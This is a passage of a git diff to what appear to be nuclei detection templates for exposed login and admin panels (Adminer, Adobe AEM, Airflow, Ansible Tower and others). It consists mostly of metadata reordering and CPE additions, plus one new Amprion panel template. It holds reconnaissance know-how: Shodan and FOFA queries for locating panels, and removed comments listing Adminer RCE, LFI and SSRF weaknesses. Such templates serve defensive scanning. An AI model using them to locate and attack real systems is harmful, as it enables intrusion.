4b0a00483046022100c241b2782da3ebdfa49a2fb64590aea15664a4b46e973b63a485d1a15c6963b6022100be3e015ad635bbf8711a6db7b2040aff4e50bfc2e6ab80886ac177ca158f3a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 8d38b0f9b2..8beeab25b4 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -9,16 +9,12 @@ info: - https://blog.sorcery.ie/posts/adminer/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 741 - vendor: adminer product: adminer + vendor: adminer tags: panel,fuzz,adminer,login,sqli http: @@ -53,4 +49,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4b0a00483046022100d1fcc4e636bdb5f3961f4541594d60ac0dc86688a2cda52de2530fbf4ca9b770022100d68508fb2d73378f62f821365ccc2f11f063da2ae73ded7792159a9a1c97e373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9b52eb14eff5244681c7c9c5a0ba690f0ede3ae8be5a5a1cc836129feba30a502203b460896e6054121461e4687a0095f7067154c0c0aa8acfee98515857bdf1775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index ed7b466c5c..e9543e8b03 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -9,12 +9,13 @@ info: - https://blog.sorcery.ie/posts/adminer/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 8 - vendor: adminer product: adminer shodan-query: title:"Login - Adminer" + vendor: adminer + verified: true tags: panel,adminer http: @@ -51,4 +52,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a00473045022100914342a33dbdffa4472b7b4e4873971c3ffb80afe60590bd3ca7c6319800e2b10220097016d363983ff4944393e0ea995961709bf9e65aafad9f808c90d307190eec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f8f183a3f1aec4c1776bf24cac3abdc9c202b8cfb15c67232040d447a26d38002205f8ef54880eb471987d6c3757c50571a8a3d9df53d5a279b803e99ac75521ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index ed0a28658a..48c5d1a42f 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -8,8 +8,8 @@ info: classification: cwe-id: CWE-200 metadata: - max-request: 1 fofa-query: app="AdminSet" + max-request: 1 reference: - https://github.com/guhongze/adminset/ tags: adminset,panel @@ -32,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100eb908932891337d53a3a07ca6ea1a6c7eed7c522a413a653e2d710bbdae50835022045c6e93343ec70e8380ac9408f7e48b6ab97ac5150c0dec08241c0088db3ca08:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009675e2dfb0b94115aff6147949e37c234e508f1099adcd15050efe8a97421f4102204280dba047d6e4823c61339dd8a23534b8d7bd063b2d617c5c455d2aa8f18dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index 4ce1fd7b95..1c53d8de87 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -9,11 +9,12 @@ info: - https://www.exploit-db.com/ghdb/6846 classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 2 - vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + vendor: adobe tags: panel,adobe,coldfusion,edb http: @@ -31,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c530046bc7978791c45db471f7cc9fadf3f10390fedbe810e335a7db86af02c02203d031ba1b6d448328cca6499507300977fa04199b3a4c40621809333db4d7308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220703b43ad652157d7cfa4c62f36643fd22f3e471b5e1ce46f446e74a5bb717fd4022100a1768401ea9cdff2b7b38a6f2e1b5ac302c4800311ce26ae47a35dab174fd117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index 3861f8b5cb..e8ce76b66a 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -9,10 +9,11 @@ info: - https://www.adobe.com/products/adobeconnect.html classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: adobe product: connect + vendor: adobe tags: adobe,panel,connect-central http: @@ -30,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207756967439aa6d331c830bef17f421c0cfcb1d3fe562606e1c8f26bf450e43bf022100eba3abad3e872c03c34f39b693940217591c120e90f5938241a7185ed22694e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207fdc0717180f5c3a2962899d5f7e7dd6ab5af7f30f958f5a8ed4d821d284d492022100f42f33d6101fbbd3889b206a59c44d6a643ef27af203b1f34507d97a5b0a7f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml index 082b631684..7cbef5bf80 100644 --- a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -9,11 +9,12 @@ info: - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: adobe product: experience_manager shodan-query: http.title:"AEM Sign In" + vendor: adobe tags: panel,aem,adobe http: @@ -30,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b4a6911dd09f41eb6a09016216994ee1ca4b02d09bafd62f2955cd77081bf7702203c59f26c5713da8d91787c24d1b46fea475dd538316b7601629ee4857b390b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f18e3670ddcebc689137819479658379c644f0ed75215d0e356338a5b4921c80221009cf8e3d0ba031262e5483191b0834d64b86dd60051bdd1ca0567bc297e891dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index 37cc15284b..40889640a4 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -9,15 +9,15 @@ info: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + vendor: adobe tags: panel,aem,adobe http: @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022015818dd99871bfff4c18447f158b5a4bbf6659bf9f3fbdd237680fbc383673e6022100972e20fd370aa9dbf7576d917f0a54ba538d5428a2850fc421093c6c2db8a0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c0e2de79d2fdca7c3e2b3188880dea5c570ffe0792ada4615862565a7b3c64f02202d0234c0e32c7f6d32146dd9b8a3814b053575aa7ee1a48c0f0b361ac4aa57d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index 07b55a7988..d44f6ecd73 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -9,15 +9,15 @@ info: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + vendor: adobe tags: panel,aem,adobe,sling http: @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5534fbdf29fd86ed429fdf026ab77c7935d688e198373647f8791a79802f2f8022100a4b6f0e3379e35c7c7c9be920b2a2d607af6ec184bbfb20139b2e34108071a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ebb04f07ba4604d3d6fe1b930ae1351e6ee34bb6b7f13ce850c1336f4cebc52022013841f057144f9de90e3361a59164c69e741d22c87cd860f7c4bb3d6b6c9b2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/afterlogic-webmail-login.yaml b/http/exposed-panels/afterlogic-webmail-login.yaml index 27750c70c4..0f84ff0339 100644 --- a/http/exposed-panels/afterlogic-webmail-login.yaml +++ b/http/exposed-panels/afterlogic-webmail-login.yaml @@ -7,13 +7,13 @@ info: description: AfterLogic WebMail Login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:* metadata: + fofa-query: 'X-Server: AfterlogicDAVServer' max-request: 1 - vendor: afterlogic product: aurora - fofa-query: "X-Server: AfterlogicDAVServer" + vendor: afterlogic tags: panel,afterlogic,login,detect http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022028f83da92e2ecd1dea40a10db48fa5efc5dac940cad1a1dcc95bb5e9526933fa022030dd3b17b7aa1b4ee38c8dd98fc5c644bff450668cbd53573763c083def1e1d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040cf3f854a7d831395bf84710415827cbb37aa6bda9f78b58250a7697ca6e306022100f8f4651edff039170b90baabffbbe3c444f7e34a09c1e19a3dc1a995389e1ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 6cf3eec305..76e6a57eea 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -7,12 +7,11 @@ info: description: airCube Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.title:"AirCube Dashboard" + verified: true tags: panel,aircube http: @@ -30,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220142731bb41dfdf971dc26950f8d20c9d6b23f9b8fde977b4dc6fc2c02adabc2c022100a859ebaf732a39c9cc6b0f11880934a454ea18d9a77f01ce3a01c29ba10ce2c2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fd6c23985fea3ea42e77ba203a8fce9e43333562673cb0c2706f59e22201f712022005c769ad7b436b5b9b0b4d507d901e3d8c2170ddad219dbafed8d890899a7dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index dca2702621..e0dee7f194 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -7,12 +7,11 @@ info: description: airCube login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:1249285083 + verified: true tags: panel,aircube,ubiquiti http: @@ -30,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ff394be81940ac2376e9526d89d58ca9da0246e1b6258216345e0b1cd4e9ceef022007195a24ca2d92acfa726cfe37973124ad91f454c627ef46f8165d646e5b7bcb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0cde8a94d9a87777fa4576699697df9a9bc6161482e374b8c93950042d73e6e02206095562164b4e93fd6ab403958fceedb86401484f02abf53c70b62888d428e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index 28e4c147ef..c7beb91b2f 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -9,13 +9,13 @@ info: - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-668 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: max-request: 2 - vendor: apache product: airflow shodan-query: title:"Sign In - Airflow" + vendor: apache tags: panel,apache,airflow,admin http: @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ff6c590e3d8652bff88a51d224349359ccf371234f389844cc09d78042d4f6de022043516eb4c2440f6d02a86343799a8882802d3cbd02e1b48890388c169feed8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb0dd6f900e0a25540a87511757830536aff2963facff3165c0ffb3b04e26dcd022100b862fb6a05ed472db0f7a913c1f26bfa3a8325cda393d7e4a393d84f97d032c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index 40f3e1ef15..4120df8a00 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -7,12 +7,11 @@ info: description: AirNotifier login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.title:"AirNotifier" + verified: true tags: panel,airnotifier http: @@ -38,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220465bc3a290f7e35c1cbe295b68987ca136ac68ee0008195ce5a32a637e7c7c9c022100e808d8cf7ed7aa9b219ea272e3c22402e5e70d58b50b9b36315a15cd0af445d8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207fb28075cac9c1b3e06234ce965a9e715df9fd9d77688d7be5e867d37c08fb93022062bfb7fd3f956b5ddb44e1a53fd4df73afac4846df3ffe9835895ec2a4fa40a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index f1439caba6..1c18156638 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -9,10 +9,11 @@ info: - https://techdocs.akamai.com/cloudtest/docs classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: akamai product: cloudtest + vendor: akamai tags: panel,akamai http: @@ -31,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206decd56581faecb5da516df253eda51fb3d6beb76139e5d37dbf8fdcdc6349b60221009029459d94301ee9b9ae5a5d6eacf519ed934148890235763e6b76d13d484b10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204784d969cbbfb1472d923905a78cac56c1695004b9305686bd10da59cc48470902210096cb5382dc5689ee1188f42f1410a9806ea23d4e59b95f2aefaf9821d55cde70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index b149393e54..23c7abb560 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -9,10 +9,11 @@ info: - https://www.alfresco.com/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:android:*:*:* metadata: max-request: 1 - vendor: alfresco product: alfresco + vendor: alfresco tags: alfresco,tech,panel http: @@ -40,4 +41,4 @@ http: - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' -# digest: 4a0a0047304502210092d1e4b9709b5c51e9900bfcb88ad70da53017a26ecbd6cbf077df84d1000acd0220476dcb9adf53d2620a2f957bf7ae77801e81b45459025d626d83c1f37db1361f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d893c552b5e2bdde2631fec4d5ef9896421e1175b5b11b2eae4652101a550a0022100d2ae2342988557ee19fe02dfc809028429ddb4ff01d94fadf67709aa6cabcef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/allied-telesis-exposure.yaml b/http/exposed-panels/allied-telesis-exposure.yaml index 825744835c..b8e48488e2 100644 --- a/http/exposed-panels/allied-telesis-exposure.yaml +++ b/http/exposed-panels/allied-telesis-exposure.yaml @@ -9,15 +9,14 @@ info: - https://www.alliedtelesis.com/in/en classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 - vendor: allied_telesis product: device_gui shodan-query: title:"Allied Telesis Device GUI" - tags: panel,allied + vendor: allied_telesis + verified: true + tags: panel,allied,allied_telesis http: - method: GET @@ -39,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204fac6741dba866ab690a61fbb43d751293537f2f4038dd6fd1dcbac123cd5794022100f40f58e10555127c08d28f98c296f91c2b288ebce0d5528fc5e6909a87da7eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee028fb7d8d6ac97c18dca4a3bfad7955ccd4c636f8a6fc017f2ff150f56700302207da21269f555a6a7ac988509c3799af6823420b112f4879cc9a9c7ae7e775b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index b096151e48..bb84700507 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -7,12 +7,12 @@ info: description: An Apache Ambari panel was discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-668 + cpe: cpe:2.3:a:apache:ambari:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: apache product: ambari + vendor: apache tags: panel,apache,ambari,exposure http: @@ -26,4 +26,4 @@ http: - 'Ambari' - 'href="http://www.apache.org/licenses/LICENSE-2.0"' condition: and -# digest: 490a00463044022059b89f72b2cbf87f42d3a6d60154bc8ec9eae25feeddd807959f0f1ba888c0e4022031d7c47fe64f4560c57c6178201701319592d8f622c14e01041c24d3adfbe687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204acc787ea236f0c2b4073dd4042b4cac95511ea9f6e9ed03d23855b0c1c94aeb02200e69631855bfc6da502fb4eb99f610caa62e18bd66806eec5b1d32a54ece8e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/amcrest-login.yaml b/http/exposed-panels/amcrest-login.yaml index 61239a0f39..48ae7581eb 100644 --- a/http/exposed-panels/amcrest-login.yaml +++ b/http/exposed-panels/amcrest-login.yaml @@ -9,12 +9,13 @@ info: - https://www.exploit-db.com/ghdb/7273 classification: cwe-id: CWE-200 + cpe: cpe:2.3:h:amcrest:ip2m-853ew:*:*:*:*:*:*:*:* metadata: + google-query: intext:"amcrest" "LDAP User" max-request: 1 - vendor: amcrest product: ip2m-853ew shodan-query: html:"amcrest" - google-query: intext:"amcrest" "LDAP User" + vendor: amcrest tags: panel,camera,amcrest,edb http: @@ -33,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022003b35dd4bd7ae0a4bd3db5a61093f27088725f9f577594dd92ff95214ec3bd9702203cb2b4470c6efac85edbede00124e232d444eeef2a7f70b11b78b1a0208aba24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022076db99c5e7b0ee2361529fdd9a29ce7c0698b7a64eace323912e6f406a5e3f7c022100bb938751370e22690a0d7167a0907e0734bf8f730c5519254063c551eafa7a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ametys-admin-login.yaml b/http/exposed-panels/ametys-admin-login.yaml index ec0677628e..33bacdeae1 100644 --- a/http/exposed-panels/ametys-admin-login.yaml +++ b/http/exposed-panels/ametys-admin-login.yaml @@ -7,10 +7,11 @@ info: description: An Ametys admin login panel was discovered. classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: ametys product: ametys + vendor: ametys tags: panel,ametys,cms http: @@ -36,4 +37,4 @@ http: group: 1 regex: - ' ([0-9.]+)' -# digest: 490a0046304402204ce1b77368a483e313e1c90677f5a93ceb50e76988e975d253cc3a5347f7c7c702202c5609019aa7e1e7875e542b8a693aa0d411a406ac156d18b4ffefcabba9179f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8879733aff3c8bd50703cabb23bc24eacdfe95e5ce14302a968ecf962b29767022033238a5f9c57cefeb35023713b7506e88aec8ed590fd10b75bcf11442e23b951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/amp-application-panel.yaml b/http/exposed-panels/amp-application-panel.yaml index c08a536d10..ffbe2c2331 100644 --- a/http/exposed-panels/amp-application-panel.yaml +++ b/http/exposed-panels/amp-application-panel.yaml @@ -7,15 +7,15 @@ info: description: Application Management Panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: cubecoders product: amp shodan-query: title:"AMP - Application Management Panel" - tags: panel,amp + vendor: cubecoders + verified: true + tags: panel,amp,cubecoders http: - method: GET @@ -32,4 +32,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022020ff7fb4ce234031d46c48d39ab4dd33d65772069e77a275f1e84900466de1530221008a5ab081c74ad8afe46420a70d9edc565a9594f0ba690c4adbcf05c5b1546e0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001f279a936bf2746faf11df9f5e6c7ec5dfcb230319b17e97649696af44561f602203d4cd614cdc13e7c5718cc1e8c9fad14b631666ee55b676a4c32c4365b3ed320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ampache-panel.yaml b/http/exposed-panels/ampache-panel.yaml index 81853d0407..1efadb34ec 100644 --- a/http/exposed-panels/ampache-panel.yaml +++ b/http/exposed-panels/ampache-panel.yaml @@ -7,14 +7,14 @@ info: description: Ampache login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 3 - vendor: ampache product: ampache shodan-query: http.title:"For the Love of Music" + vendor: ampache + verified: true tags: panel,ampache http: @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008dba1c100869c96d0c7a7e0a991eb1f32d3a36262204a94f2850ea985f981c1c022100843151257d7660d9a4bd809cb5c460ffb1bc33f10df6d73f2f4222050b623986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026ff670001f355854261f51aa9568db44aab6ef281df0e668e39bca7245c0c22022018267c7949b2c76dfc72631a00c2dc64303405e61e78e4c3e6ec00de060befbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/amprion-gridloss-panel.yaml b/http/exposed-panels/amprion-gridloss-panel.yaml new file mode 100644 index 0000000000..6ec032abcf --- /dev/null +++ b/http/exposed-panels/amprion-gridloss-panel.yaml @@ -0,0 +1,33 @@ +id: amprion-gridloss-panel + +info: + name: Amprion Grid Loss Login Panel - Detect + author: righettod + severity: info + description: | + Amprion Grid Loss login panel was detected. + reference: + - https://www.amprion.net/index-2.html + metadata: + max-request: 1 + verified: true + tags: panel,amprion,login,detect +http: + - method: GET + path: + - "{{BaseURL}}/config/public" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "amprion") && contains(to_lower(body), "grid loss")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"envTitle":"([A-Z0-9a-z]+)"' +# digest: 4a0a0047304502204392a65022d7ce48d4f84ab1110cccde1b8861c5179c36c92af33872bb60f695022100b0d9d273907a28033a78aafb11d0fd33963d37f04d7be7712afef0d80de5018b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/anaqua-login-panel.yaml b/http/exposed-panels/anaqua-login-panel.yaml index 0c5a0ec6b9..910fd83a12 100644 --- a/http/exposed-panels/anaqua-login-panel.yaml +++ b/http/exposed-panels/anaqua-login-panel.yaml @@ -8,12 +8,11 @@ info: Checks for the presence of Anaqua login page classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" + verified: true tags: anaqua,login,panel http: @@ -33,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022060d150b256f40e43d6af397522ba3bbd382272d4d9eb1e0a051ff5991f287eac022100ec26375c36ddb970378b49e6bc3d54a8a4ece3d7343064fe43746bb9be38d497:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201189396d086e2b7bb798f88291df48a4d16eeeb737952f35ad48a022999bf28a022100a648a6cd84fa8c2aa9da5a3477b096fd0e71be1224ee429dff3c0c86676d824a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ansible-tower-exposure.yaml b/http/exposed-panels/ansible-tower-exposure.yaml index d0d1145809..61046db509 100644 --- a/http/exposed-panels/ansible-tower-exposure.yaml +++ b/http/exposed-panels/ansible-tower-exposure.yaml @@ -10,15 +10,15 @@ info: - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:* metadata: + google-query: intitle:"Ansible Tower" max-request: 1 - vendor: redhat product: ansible_tower shodan-query: title:"Ansible Tower" - google-query: intitle:"Ansible Tower" - tags: panel,ansible + vendor: redhat + tags: panel,ansible,redhat http: - method: GET @@ -38,4 +38,4 @@ http: part: body regex: - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' -# digest: 490a0046304402205fd2901b272856932c212309476cfcedf101a21894a523bdc82ef81fd5a28a7802203fd4f82267b4e16b428103b3c753d10f9b0eaadbadf217ae826b7e704baa7730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aba5282f230e4fdfd2d981a9a1c2eec10254015b4d2a2fbc1b26370b80b4395e022100b676c5e2e3f6a82728f398bef3ff80ab2cc18a24987b5f81c7ef597296ea0f69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache-jmeter-dashboard.yaml b/http/exposed-panels/apache-jmeter-dashboard.yaml index e7ac427a06..e104e72e0b 100644 --- a/http/exposed-panels/apache-jmeter-dashboard.yaml +++ b/http/exposed-panels/apache-jmeter-dashboard.yaml @@ -7,14 +7,14 @@ info: description: Apache JMeter Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: 